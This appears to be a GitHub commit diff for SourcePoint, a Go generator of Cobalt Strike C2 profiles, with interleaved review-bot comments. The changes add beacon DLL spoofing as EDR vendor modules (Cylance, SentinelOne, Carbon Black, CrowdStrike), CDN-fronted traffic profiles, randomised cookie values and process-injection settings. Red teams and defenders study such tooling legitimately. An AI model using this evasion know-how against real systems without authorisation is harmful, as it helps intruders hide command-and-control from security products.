
v2.0
Matthew Eidelberg committed Oct 6, 2021
1 parent 7bebe64 commit 28ffed0
Showing 5 changed files with 185 additions and 41 deletions.
20 changes: 13 additions & 7 deletions Loader/Loader.go
Expand Up @@ -85,12 +85,15 @@ func GenerateOptions(stage, sleeptime, jitter, useragent, uri, customuri, beacon
Process_Inject.Variables = GenerateProcessInject(processinject_min_alloc, injector)
Beacon_GETPOST_Profile.Variables, Beacon_SSL.Variables = GenerateProfile(Profile, CDN, CDN_Value, cert_password, custom_cert, ProfilePath, Host)
fmt.Println("[*] Building Profile...")

Build(custom_cert, cert_password, outFile, Beacon_Com, Beacon_Stage_p1, Beacon_Stage_p2, Beacon_Stage_p3, Process_Inject, Beacon_PostEX, Beacon_GETPOST, Beacon_GETPOST_Profile, Beacon_SSL)
fmt.Println(HostStageMessage)
PE := strings.Split(Beacon_Stage_p2.Variables["pe"], `;`)
PE_Name := strings.Split(PE[5], `"`)
fmt.Println("[*] Beacon DLL spoffed To: " + PE_Name[1])
PEX := strings.Split(Beacon_PostEX.Variables["Post_EX_Process_Name"], `sysnative\\`)
PEX_Name := PEX[1]
fmt.Println("[*] Post-Ex Process Name: " + PEX_Name[:(len(PEX_Name)-3)])
fmt.Println("[*] Post-Ex process name: " + PEX_Name[:(len(PEX_Name)-3)])
fmt.Println("[!] Beacon shellcode will obfuscate beacon in memory prior to sleeping")
Name, _ := strconv.Atoi(Profile)
fmt.Println("[*] Seleted Profile: " + Struct.Profile_Names[Name])
fmt.Println("[+] Profile Generated: " + outFile)
Expand Down Expand Up @@ -248,6 +251,9 @@ func GenerateHTTPVaribles(Host, metadata, uri, customuri, CDN, CDN_Value, Profil
Beacon_GETPOST.Variables["maxage"] = Utils.GenerateNumer(172800, 31536001)
Beacon_GETPOST.Variables["Age"] = Utils.GenerateNumer(1222, 2500)

Beacon_GETPOST.Variables["UValue"] = Utils.GenerateValue(6, 15)
Beacon_GETPOST.Variables["CSMValue"] = Utils.GenerateValue(6, 15)

if Forwarder == true {
Beacon_GETPOST.Variables["forward"] = "true"
} else {
Expand All @@ -261,13 +267,13 @@ func GeneratePE(beacon_PE string) map[string]string {
Beacon_Stage_p2 := &Beacon_Stage_p2{}
Beacon_Stage_p2.Variables = make(map[string]string)
if beacon_PE == "" {
PE_Num, _ := strconv.Atoi(Utils.GenerateNumer(0, 25))
PE_Num, _ := strconv.Atoi(Utils.GenerateNumer(0, 30))
Beacon_Stage_p2.Variables["pe"] = Struct.Peclone_list[PE_Num]
}
if beacon_PE != "" {
PE_Num, _ := strconv.Atoi(beacon_PE)
if PE_Num >= 27 {
log.Fatal("Error: Please provide a valid PE number less the 26 option")
if PE_Num >= 30 {
log.Fatal("Error: Please provide a valid PE number less the 31 option")
}
Beacon_Stage_p2.Variables["pe"] = Struct.Peclone_list[(PE_Num - 1)]
}
Expand Down Expand Up @@ -330,7 +336,7 @@ func GenerateProfile(Profile, CDN, CDN_Value, cert_password, custom_cert, Profil
Beacon_SSL.Variables["Cert"] = Struct.Cert[4]
Beacon_GETPOST_Profile.Variables["Profile"] = Struct.HTTP_GET_POST_list[(num_Profile - 1)]

} else if num_Profile == 5 {
} else if num_Profile == 5 || num_Profile == 7 {
if cert_password == "" {
log.Fatal("Error: Please provide a Password value to use this profile")
}
Expand All @@ -339,7 +345,7 @@ func GenerateProfile(Profile, CDN, CDN_Value, cert_password, custom_cert, Profil
}
Beacon_SSL.Variables["Cert"] = Struct.Cert[4]
Beacon_GETPOST_Profile.Variables["Profile"] = Struct.HTTP_GET_POST_list[(num_Profile - 1)]
} else if num_Profile == 7 {
} else if num_Profile == 8 {
if cert_password == "" {
log.Fatal("Error: Please provide a Password value to use this profile")
}
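Review bot: The bounds check added in GeneratePE rejects option 30 and still lets bad input index out of range: `if PE_Num >= 30` refuses 30 although `Struct.Peclone_list[(PE_Num - 1)]` would address the 30th entry (umppc.dll, which the help text in this commit now advertises), while 0, a negative number, or non-numeric input (`strconv.Atoi`'s error is discarded, leaving 0) yields index -1 and a panic. Check both ends against the list itself, `if PE_Num < 1 || PE_Num > len(Struct.Peclone_list) {`, and make the message agree with the check, `log.Fatal("Error: Please provide a valid PE number between 1 and 30")` (it currently says "less the 31"). The random path in the same hunk, `GenerateNumer(0, 30)`, deserves the same care: the old call used an upper bound of 25 against a 26-entry list, which suggests the bound is inclusive, in which case 30 now indexes one past the end; `GenerateNumer(0, len(Struct.Peclone_list)-1)` avoids depending on that detail. GeneratePE's body continues past the hunk.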
30 changes: 21 additions & 9 deletions README.md
Expand Up @@ -8,6 +8,10 @@ SourcePoint is a polymorphic C2 profile generator for Cobalt Strike C2s, written
<p align="center"> <img src=Screenshots/C2int_p1.png width="900" height="710" border="2px solid #555">
<p align="center"> <img src=Screenshots/C2int_p2.png width="900" height="480" border="2px solid #555">

```
go install github.com/Tylous/SourcePoint
```


## Installation
```
Expand Down Expand Up @@ -40,12 +44,14 @@ Usage of ./SourcePoint:
The base URI for custom HTTP GET/POST profile (default "0")
-Datajitter string
Appends a value to HTTP-Get and HTTP-Post server output (default "50")
-Forwarder
Enabled the X-forwarded-For header (Good for when your C2 is behind a redirector)
-Host string
Team server domain name
-Injector string
Select the preferred method to allocate memory in the remote process:
Select the preferred method to allocate memory in The remote process:
[*] VirtualAllocEx (Great for cross architecture i.e x86 -> x64 and x64->x86)
[*] NtMapViewOfSection (A more stealthly option, however fails over to VirtualAllocEx, generating more events when it does)
[*] NtMapViewOfSection (A more steathly option however fails over to VirtualAllocEx generating more events when it does)
-Jitter string
Jitter percentage for beacon call home
-Keylogger string
Expand Down Expand Up @@ -90,10 +96,14 @@ Usage of ./SourcePoint:
[24] wow64.dll
[25] wow64win.dll
[26] WWANSVC.dll
[27] CyMemDef64.dll (Cylance's DLL)
[28] InProcessClient.dll (SentinelOne's DLL)
[29] ctiuser.dll (Carbon Black's DLL)
[30] umppc.dll (CrowdStrike's DLL)
-Password string
SSL certificate password
-PostEX_Name string
File Post-Ex activities will spawn and inject into (Use the number):
File Post-Ex activties will spawn and inject into (Use the number):
[1] WerFault.exe
[2] WWAHost.exe
[3] wlanext.exe
Expand All @@ -118,15 +128,16 @@ Usage of ./SourcePoint:
[2] Slack
[3] Gotomeeting
[4] Outlook.Live
[5] Cloudfront
[6] AzureEdge
[7] Custom (Used with ProfilePath)
[5] Safebrowsing [Cloudfront Compatible]
[6] AzureEdge [AzureEdge Compatible]
[7] Field-Keyword [Cloudfront Compatible]
[8] Custom (Used with ProfilePath)
-ProfilePath string
Path of custom HTTP GET/POST profile...
-Sleep string
Initial beacon sleep time
Inital beacon sleep time
-Stage string
Disable host staging (Default: False) (default "False")
Disable host staging (Default: False) (default "false")
-Uri string
The number URIs a profile for beacons to choose from
-Useragent string
Expand Down Expand Up @@ -205,7 +216,7 @@ Currently SourcePoint provides you with 6 baked in options for HTTP/HTTPS traffi
* Gotomeeting's Active Meeting Communication
* Microsoft Outlook's Email Communication

2 of the profile options (5 and 6) are designed specifically for:
2 of the profile options (5, 6 and 7) are designed specifically for:
* Cloudfront.net
* AzureEdge.net

Expand Down Expand Up @@ -243,6 +254,7 @@ Customuri:
CDN:
CDN_Value:
ProfilePath:
Forwarder: False
```


13 changes: 9 additions & 4 deletions SourcePoint.go
Expand Up @@ -118,7 +118,11 @@ func options() *FlagOptions {
[23] winsqlite3.dll
[24] wow64.dll
[25] wow64win.dll
[26] WWANSVC.dll`)
[26] WWANSVC.dll
[27] CyMemDef64.dll (Cylance's DLL)
[28] InProcessClient.dll (SentinelOne's DLL)
[29] ctiuser.dll (Carbon Black's DLL)
[30] umppc.dll (CrowdStrike's DLL)`)
processinject_min_alloc := flag.String("Allocation", "", "Minimum amount of memory to request for injected content (must be higher than 4096)")
Post_EX_Process_Name := flag.String("PostEX_Name", "", `File Post-Ex activties will spawn and inject into (Use the number):
[1] WerFault.exe
Expand All @@ -144,9 +148,10 @@ func options() *FlagOptions {
[2] Slack
[3] Gotomeeting
[4] Outlook.Live
[5] Cloudfront
[6] AzureEdge
[7] Custom (Used with ProfilePath)`)
[5] Safebrowsing [Cloudfront Compatible]
[6] AzureEdge [AzureEdge Compatible]
[7] Field-Keyword [Cloudfront Compatible]
[8] Custom (Used with ProfilePath)`)
ProfilePath := flag.String("ProfilePath", "", "Path of custom HTTP GET/POST profile...")
metadata := flag.String("Metadata", "base64url", `Specifies how to transform and embed metadata into the HTTP request:
[*] base64
131 changes: 114 additions & 17 deletions Struct/Struct.go
Expand Up @@ -6,10 +6,10 @@ var Profile_Names = []string{
`Slack`,
`Gotomeeting`,
`Outlook.Live`,
`Cloudfront`,
`Safebrowsing`,
`AzureEdge`,
`Custom
`}
`Field-Keyword`,
`Custom`}

var Post_EX_Process_Name = []string{`
set spawnto_x86 "%windir%\\syswow64\\WerFault.exe";
Expand Down Expand Up @@ -317,7 +317,40 @@ var Peclone_list = []string{`
set image_size_x64 "1785856";
set name "WWANSVC.DLL";
set rich_header "\x77\xf3\x15\x7d\x33\x92\x7b\x2e\x33\x92\x7b\x2e\x33\x92\x7b\x2e\x3a\xea\xe8\x2e\xb3\x92\x7b\x2e\x68\xfa\x7f\x2f\x3c\x92\x7b\x2e\x68\xfa\x78\x2f\x30\x92\x7b\x2e\x68\xfa\x7e\x2f\x2d\x92\x7b\x2e\x33\x92\x7a\x2e\xf8\x97\x7b\x2e\x68\xfa\x7a\x2f\x3e\x92\x7b\x2e\x68\xfa\x7b\x2f\x32\x92\x7b\x2e\x68\xfa\x72\x2f\xa9\x92\x7b\x2e\x68\xfa\x86\x2e\x32\x92\x7b\x2e\x68\xfa\x84\x2e\x32\x92\x7b\x2e\x68\xfa\x79\x2f\x32\x92\x7b\x2e\x52\x69\x63\x68\x33\x92\x7b\x2e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
`}
`,
`
set checksum "164653";
set compile_time "06 Nov 2020 18:42:28";
set entry_point "63072";
set name "CyMemDef64.dll";
set rich_header "\x5f\x64\xdb\xae\x1b\x05\xb5\xfd\x1b\x05\xb5\xfd\x1b\x05\xb5\xfd\x1b\x05\xb4\xfd\x30\x05\xb5\xfd\xe7\x72\x0c\xfd\x18\x05\xb5\xfd\x7d\xeb\x66\xfd\x07\x05\xb5\xfd\x3c\xc3\x78\xfd\x1a\x05\xb5\xfd\x7d\xeb\x7f\xfd\x1a\x05\xb5\xfd\x3c\xc3\x7c\xfd\x1a\x05\xb5\xfd\x1b\x05\x22\xfd\x1a\x05\xb5\xfd\x7d\xeb\x79\xfd\x1a\x05\xb5\xfd\x52\x69\x63\x68\x1b\x05\xb5\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
`,
`
set checksum "1968945";
set compile_time "26 Jul 2021 18:09:30";
set entry_point "1099888";
set image_size_x86 "2072576";
set image_size_x64 "2072576";
set name "InProcessClient.dll";
set rich_header "\xd5\x71\x0e\xb3\x91\x10\x60\xe0\x91\x10\x60\xe0\x91\x10\x60\xe0\x85\x7b\x63\xe1\x84\x10\x60\xe0\x85\x7b\x65\xe1\x24\x10\x60\xe0\x48\x64\x64\xe1\x83\x10\x60\xe0\x48\x64\x63\xe1\x9d\x10\x60\xe0\xf7\x7f\x9d\xe0\x92\x10\x60\xe0\x4a\x64\x61\xe1\x93\x10\x60\xe0\x85\x7b\x64\xe1\xb2\x10\x60\xe0\x85\x7b\x61\xe1\x94\x10\x60\xe0\x48\x64\x65\xe1\x0e\x10\x60\xe0\xfb\x78\x65\xe1\x80\x10\x60\xe0\x85\x7b\x66\xe1\x93\x10\x60\xe0\x91\x10\x61\xe0\x5c\x11\x60\xe0\x4a\x64\x69\xe1\x03\x10\x60\xe0\x4a\x64\x63\xe1\x93\x10\x60\xe0\x4a\x64\x60\xe1\x90\x10\x60\xe0\x4a\x64\x9f\xe0\x90\x10\x60\xe0\x91\x10\xf7\xe0\x90\x10\x60\xe0\x4a\x64\x62\xe1\x90\x10\x60\xe0\x52\x69\x63\x68\x91\x10\x60\xe0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
`,
`
set checksum "2817694";
set compile_time "19 May 2021 13:31:53";
set entry_point "1253200";
set image_size_x86 "2863104";
set image_size_x64 "2863104";
set name "ctiuser.dll";
set rich_header "\x15\xd9\xb0\x30\x51\xb8\xde\x63\x51\xb8\xde\x63\x51\xb8\xde\x63\x45\xd3\xda\x62\x47\xb8\xde\x63\x45\xd3\xdd\x62\x5f\xb8\xde\x63\x45\xd3\xdb\x62\x90\xb8\xde\x63\xcf\x18\x19\x63\x52\xb8\xde\x63\xa9\xc8\xda\x62\x40\xb8\xde\x63\xa9\xc8\xdd\x62\x5b\xb8\xde\x63\xa9\xc8\xdb\x62\xdf\xb8\xde\x63\x45\xd3\xdf\x62\x54\xb8\xde\x63\x45\xd3\xd8\x62\x53\xb8\xde\x63\x51\xb8\xdf\x63\x29\xb9\xde\x63\xe9\xc9\xda\x62\x69\xb8\xde\x63\xe9\xc9\xdb\x62\x13\xb8\xde\x63\xe9\xc9\xde\x62\x50\xb8\xde\x63\xe9\xc9\x21\x63\x50\xb8\xde\x63\x51\xb8\x49\x63\x50\xb8\xde\x63\xe9\xc9\xdc\x62\x50\xb8\xde\x63\x52\x69\x63\x68\x51\xb8\xde\x63\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
`,
`
set checksum "83724";
set compile_time "05 Aug 2020 16:06:20";
set entry_point "5664";
set name "umppc.dll";
set rich_header "\xba\xf0\x63\x99\xfe\x91\x0d\xca\xfe\x91\x0d\xca\xfe\x91\x0d\xca\x92\xf9\x0e\xcb\xff\x91\x0d\xca\x92\xf9\x05\xcb\xf3\x91\x0d\xca\x9b\xf7\x0e\xcb\xfc\x91\x0d\xca\x9b\xf7\x09\xcb\xfb\x91\x0d\xca\x9b\xf7\x0c\xcb\xfd\x91\x0d\xca\xfe\x91\x0c\xca\xc6\x91\x0d\xca\x92\xf9\x0d\xcb\xff\x91\x0d\xca\x92\xf9\xf2\xca\xff\x91\x0d\xca\x92\xf9\x0f\xcb\xff\x91\x0d\xca\x52\x69\x63\x68\xfe\x91\x0d\xca\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
`,
}

var Useragent_list = []string{
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4242.0 Safari/537.36",
Expand Down Expand Up @@ -780,8 +813,8 @@ server {
http-stager {
set uri_x86 "/Meeting/32251817/";
set uri_x64 "/Meeting/32251816/";
set uri_x86 "/Meeting/{{.Variables.UValue}}/";
set uri_x64 "/Meeting/{{.Variables.UValue}}/";
client {
header "Host" "{{.Variables.Host}}";
Expand All @@ -797,20 +830,20 @@ server {
}
`, `
http-get {
{{.Variables.HTTP_GET_URI}}
http-config {
#set "true" if teamserver is behind redirector
set trust_x_forwarded_for "{{.Variables.forward}}";
}
http-get {
{{.Variables.HTTP_GET_URI}}
client {
header "Host" "{{.Variables.Host}}";
header "Accept" "*/*";
header "Cookie" "MicrosoftApplicationsTelemetryDeviceId=95c18d8-4dce9854;ClientId=1C0F6C5D910F9;MSPAuth=3EkAjDKjI;xid=730bf7;wla42=ZG0yMzA2KjEs";
header "Cookie" "MicrosoftApplicationsTelemetryDeviceId=95c18d8-4dce9854;ClientId=1C0F6C5D910F9;MSPAuth=3EkAjDKjI;xid=730bf7;wla42={{.Variables.UValue}}";
metadata {
{{.Variables.metadata_mode}};
Expand Down Expand Up @@ -944,7 +977,7 @@ client {
header "Accept-Language" "en-US,en;q=0.5";
metadata {
{{.Variables.metadata_mode}};
prepend "REF=ID=";
prepend "REF=ID={{.Variables.UValue}}";
header "Cookie";
}
}
Expand Down Expand Up @@ -976,7 +1009,7 @@ client {
id {
{{.Variables.metadata_mode}};
prepend "U=193u81141";
prepend "U={{.Variables.UValue}}";
prepend "REF=ID=";
header "Cookie";
}
Expand Down Expand Up @@ -1066,7 +1099,6 @@ server {
}
}
`, `
http-config {
#set "true" if teamserver is behind redirector
Expand All @@ -1084,7 +1116,7 @@ client {
metadata {
{{.Variables.metadata_mode}};
prepend "PREF=ID=";
prepend "PREF=ID={{.Variables.CSMValue}}";
header "Cookie";
}
}
Expand Down Expand Up @@ -1115,7 +1147,7 @@ client {
id {
{{.Variables.metadata_mode}};
prepend "U=779b64e1a7ed737a";
prepend "U={{.Variables.UValue}}";
prepend "PREF=ID=";
header "Cookie";
}
Expand All @@ -1137,7 +1169,72 @@ server {
print;
}
}
}`}
}`,
`
http-config {
#set "true" if teamserver is behind redirector
set trust_x_forwarded_for "{{.Variables.forward}}";
}
http-get {
{{.Variables.HTTP_GET_URI}}
client {
header "Accept" "*/*";
metadata {
{{.Variables.metadata_mode}};;
prepend "session-token=";
append "csm-hit={{.Variables.CSMValue}}";
header "Cookie";
}
}
server {
output {
print;
}
}
}
http-post {
{{.Variables.HTTP_POST_URI}}
client {
header "Accept" "*/*";
header "Content-Type" "text/xml";
header "X-Requested-With" "XMLHttpRequest";
id {
{{.Variables.metadata_mode}};;
prepend "U={{.Variables.UValue}}";
prepend "REF=ID=";
header "Cookie";
}
output {
print;
}
}
server {
header "Server" "Server";
header "X-Frame-Options" "SAMEORIGIN";
header "x-ua-compatible" "IE=edge";
output {
print;
}
}
}
`,
}

var Cert = []string{`
set O "Microsoft Corporation"; #Organization Name
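Review bot: The new Field-Keyword profile terminates `{{.Variables.metadata_mode}}` with `;;` in both its metadata block and its id block, whereas every other profile in this file writes `{{.Variables.metadata_mode}};` with a single semicolon; unless the Malleable C2 parser tolerates an empty statement, c2lint will reject the generated profile for option 7 alone. Drop the extra character in both places: `{{.Variables.metadata_mode}};`. Two of the added Peclone_list entries (CyMemDef64.dll and umppc.dll) also omit the `image_size_x86`/`image_size_x64` lines their neighbours carry; if those sizes are meant to match the spoofed module, a comment such as `# image_size left at default - verify against the real DLL` would tell the next editor this is deliberate rather than an oversight. The Field-Keyword http-get client block sets no `Host` header while the other profiles do, presumably intentional for a CDN-fronted profile, but worth a one-line comment saying so.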